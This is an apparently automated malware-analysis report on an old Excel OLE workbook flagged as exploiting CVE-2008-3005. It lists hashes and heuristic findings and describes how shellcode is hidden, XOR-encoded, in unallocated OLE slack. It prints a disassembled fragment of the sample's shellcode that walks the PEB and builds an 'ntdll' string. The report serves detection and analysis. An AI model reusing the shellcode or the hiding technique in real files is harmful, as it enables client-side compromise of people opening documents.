Malicious Office (OLE) / .RL — malware analysis report

Static analysis result for SHA-256 afe6b95ad95bc689…

MALICIOUS

Office (OLE) / .RL

Size: 84.0 KB
Created: 1996-12-17 01:32:42
Authoring application: Microsoft Excel
First seen: 2026-06-21
MD5: 0e4e3c2d84a9bc726a50b3c91346fbb1
SHA-1: 52eb16966670b76f8728fda28c48bc6c49f20e07
SHA-256: afe6b95ad95bc689c356f34ec8d9094c495e4af57c932ac413b65ef132063acc
Risk Score: 200

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution

The file is classified as malicious because the critical heuristic for CVE-2008-3005, an Excel Index Array exploit, fired: the file is shaped to exploit this vulnerability for client-side code execution. The XOR-encoded strings and the PEB access point to a second stage, most likely payload delivery, although no specific scripts or URLs were extracted to confirm this.

Heuristics (4)

  • Excel Index Array exploit — CVE-2008-3005 (severity: critical; CVE likely; rule: CVE_2008_3005)
    Legacy Excel workbook has the CVE-2008-3005 exploit shape: a compact BIFF8 FORMAT-index cluster paired with a normal XF table and a large unallocated OLE slack region used to stage the payload. The FORMAT pattern alone is not sufficient, so the rule requires the OLE slack payload-hiding context to keep false positives low.
  • XOR-encoded strings (key 0x97) (severity: critical; rule: SC_XOR_ENCODED)
    Found 1 Windows library/API name(s) XOR-encoded with single-byte key 0x97: 'RegOpenKeyExA'
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'add' is 89% of instructions — a sled or padding/filler run, not program logic).
  • PEB access via FS segment (x86) (severity: high; rule: SC_PEB_ACCESS)
    Disassembly
    x86 disassembly · validity: code (0.984) — 3/3 branch targets land on an instruction boundary (100% coherence)
    000037A2  64a130000000      mov eax, dword ptr fs:[0x30]
    000037A8  8b400c            mov eax, dword ptr [eax + 0xc]
    000037AB  8b701c            mov esi, dword ptr [eax + 0x1c]
    000037AE  ad                lodsd eax, dword ptr [esi]
    000037AF  8b6808            mov ebp, dword ptr [eax + 8]
    000037B2  8bf7              mov esi, edi
    000037B4  6a0f              push 0xf
    000037B6  59                pop ecx
    000037B7  e8f6020000        call 0x3ab2
    000037BC  e2f9              loop 0x37b7
    000037BE  8bdf              mov ebx, edi
    000037C0  81eb00010000      sub ebx, 0x100
    000037C6  c7036e74646c      mov dword ptr [ebx], 0x6c64746e
    000037CC  c743046c000000    mov dword ptr [ebx + 4], 0x6c
    000037D3  53                push ebx
    000037D4  8b06              mov eax, dword ptr [esi]
    000037D6  e81c030000        call 0x3af7
    000037DB  8be8              mov ebp, eax
    000037DD  6a01              push 1
    000037DF  59                pop ecx
    000037E0  e8cd020000        call 0x3ab2
    000037E5  e2f9              loop 0x37e0
    000037E7  8bee              mov ebp, esi
    000037E9  81ec00040000      sub esp, 0x400
    000037EF  33c0              xor eax, eax
    000037F1  894530            mov dword ptr [ebp + 0x30], eax
    000037F4  8b7d5c            mov edi, dword ptr [ebp + 0x5c]
    000037F7  83453004          add dword ptr [ebp + 0x30], 4
    000037FB  6a00              push 0
    000037FD  ff7530            push dword ptr [ebp + 0x30]
    00003800  8b                .byte 0x8b
    00003801  45                inc ebp
  • OLE document has large unaccounted-for region (severity: high; rule: OLE_SLACK_ANOMALY)
    OLE file is 86,016 bytes but its declared streams total only 21,308 bytes — 64,708 bytes (75%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).